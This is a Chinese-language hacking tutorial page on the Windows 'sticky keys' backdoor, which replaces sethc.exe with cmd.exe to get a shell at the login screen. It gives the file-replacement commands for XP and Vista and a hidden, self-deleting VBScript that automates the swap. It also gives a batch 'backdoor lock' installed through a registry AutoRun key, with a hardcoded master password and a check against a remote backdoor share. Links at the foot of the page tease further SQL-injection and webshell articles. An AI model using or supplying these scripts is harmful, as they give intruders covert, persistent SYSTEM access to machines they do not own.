变态入侵之有史以来最酷的Windows后门sethc.exe

所属分类: 实用技巧 / 安全教程 阅读数: 2080
收藏 0 赞 0 分享
后门原理: 

在windows 2000/xp/vista下,按shift键5次,可以打开粘置,会运行sethc.exe,而且,在登录界面里也可以打开。这就让人联想到WINDOWS的屏保,将程序替换成cmd.exe后,就可以打开shell了。 

XP: 

将安装源光盘弹出(或将硬盘上的安装目录改名) 
cd %widnir%\system32\dllcache 
ren sethc.exe *.ex~ 
cd %widnir%\system32 
copy /y cmd.exe sethc.exe 

VISTA: 

takeown /f c:\windows\system32\sethc.exe 
cacls c:\windows\system32\sethc.exe /G administrator:F 
然后按XP方法替换文件 

在登录界面按5此SHIFT,出来cmd shell,然后…… 

后门扩展: 
复制代码 代码如下:

Dim obj, success   
Set obj = CreateObject("WScript.Shell")   
success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe", 0, True)   
success = obj.run("cmd /c echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F", 0, True)   
success = obj.run("cmd /c copy %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe", 0, True)   
success = obj.run("cmd /c copy %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe", 0, True)   
success = obj.run("cmd /c del %SystemRoot%\system32\sethc.exe", 0, True)   
success = obj.run("cmd /c ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True)   


第二句最有意思了.自动应答....以前就遇到过类似的问题 
再更新.加个自删除,简化代码...  
复制代码 代码如下:

On Error Resume Next   
Dim obj, success   
Set obj = CreateObject("WScript.Shell")   
success = obj.run("cmd /c takeown /f %SystemRoot%\system32\sethc.exe&echo y| cacls %SystemRoot%\system32\sethc.exe /G %USERNAME%:F&copy %SystemRoot%\system32\cmd.exe %SystemRoot%\system32\acmd.exe&copy %SystemRoot%\system32\sethc.exe %SystemRoot%\system32\asethc.exe&del %SystemRoot%\system32\sethc.exe&ren %SystemRoot%\system32\acmd.exe sethc.exe", 0, True)   
CreateObject("Scripting.FileSystemObject").DeleteFile(WScript.ScriptName)  

后门锁扩展: 
allyesno注:可以采用cmd 锁 来进行cmdshell的密码验证 
用下面的后门锁的方法是 把代码保存为bdlock.bat 
然后修改注册表位置即可 
复制代码 代码如下:

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor]  
"AutoRun"="bdlock.bat"  

@Echo Off  
title 后门登陆验证  
color a  
cls  
set temprandom=%RANDOM%  
echo 请输入验证码:%temprandom%  
set/p check=  
if "%check%"=="%temprandom%%temprandom%" goto passcheck  
if "%check%"=="%temprandom%" (  
rem 后门服务器验证  
rem 如果没有后门验证服务器请rem注释掉下一行代码  
if exist \192.168.8.8\backdoor$\pass goto passcheck  
)  
echo 验证失败  
pause  
exit  
:passcheck  
echo 验证成功  
If "%passcmdlock%"=="http://blog.csdn.net/freexploit/" Goto endx  
Set passcmdlock=http://blog.csdn.net/freexploit/  
:allyesno  
Set Errorlevel=>nul  
Echo 请输入验证密码?  
Set password=allyesno Is a pig>nul  
Set/p password=  
rem 万能密码  
if "%password%"=="allyesno is a sb" goto endx  
If %time:~1,1%==0 Set timechange=a  
If %time:~1,1%==1 Set timechange=b  
If %time:~1,1%==2 Set timechange=c  
If %time:~1,1%==3 Set timechange=d  
If %time:~1,1%==4 Set timechange=e  
If %time:~1,1%==5 Set timechange=f  
If %time:~1,1%==6 Set timechange=g  
If %time:~1,1%==7 Set timechange=h  
If %time:~1,1%==8 Set timechange=i  
If %time:~1,1%==9 Set timechange=j  
set/a sum=%time:~1,1%+%time:~1,1%  
Set password|findstr "^password=%timechange%%time:~1,1%%date:~8,2%%sum%$">nul   
If "%errorlevel%"=="0" cls&Echo 口令正确&Goto End  
Echo 请联系客服咨询正确密码!&Goto allyesno  
:End  
Set password=>nul  
Set Errorlevel=>nul  
Echo  

:endx  

更多精彩内容其他人还在看

MySQL注入中导出字段内容的研究通过注入导出WebShell

大家都知道,在MySQL中,无法像MSSQL那样执行script.asp?id=1;insert into table (field) values('angel');--来插入数据,因为MySQL里最多就是用union联合查询。
收藏 0 赞 0 分享

Dedecms getip()的漏洞利用代码

flyh4t在非安全发布了dedecms getip()的注射漏洞,漏洞本身的成因没什么好说的老掉牙的X-Forwarded-For的问题,我想这个漏洞很多人都找到了,不过这个漏洞的利用有个地方还是可以说说的,可以直接得到shell:
收藏 0 赞 0 分享

NtGodMode.exe任意密码登录windows系统帐号下载

NTGod NT上帝模式,打开上帝模式可以用任意密码登录任意windows系统帐号,从而达到不增加帐号、不破坏被入侵主机系统的情况下,登录系统帐号。
收藏 0 赞 0 分享

dvbbs 8.2 SQL Injection注射漏洞分析

利用方式:一个典型的sql注射漏洞,按照公告里说的用
收藏 0 赞 0 分享

整理比较全的Access SQL注入参考

不知谁整理的access sql注入资料比较全
收藏 0 赞 0 分享

SQL Injection with MySQL 注入分析

本文作者:angel文章性质:原创 国内能看到php+Mysql注入的文章可能比较少,但是如果关注各种WEB程序的漏洞,就可以发现,其实这些漏洞的文章其实就是一个例子。
收藏 0 赞 0 分享

入侵ASP.net网站的经验附利用代码

爱好入侵的可以用下面的方法,做网站的朋友就需要了解下面的asp.net的利用代码,最好来测试下
收藏 0 赞 0 分享

黑鹰VIP教程-脚本入侵班全部提供下载

爱好脚本的朋友有福了,脚本入侵班资料下载
收藏 0 赞 0 分享

非常不错的脚本入侵基础知识总结第1/2页

简单的说来,webshell就是一个asp或php木马后门,黑客在入侵了一个网站后,常常在将这些 asp或php木马后门文件放置在网站服务器的web目录中,与正常的网页文件混在一起。
收藏 0 赞 0 分享

linux提权用的一个技巧

一个linux提权用的技巧,放出来全当找工作攒RP了。 OK,通常情况下,我们在执行bash脚本的时候,有一个执行过程,其中有一点比较重要:如果BASH_ENV被设置的话,它就会执行BASH_ENV指向的脚本
收藏 0 赞 0 分享
查看更多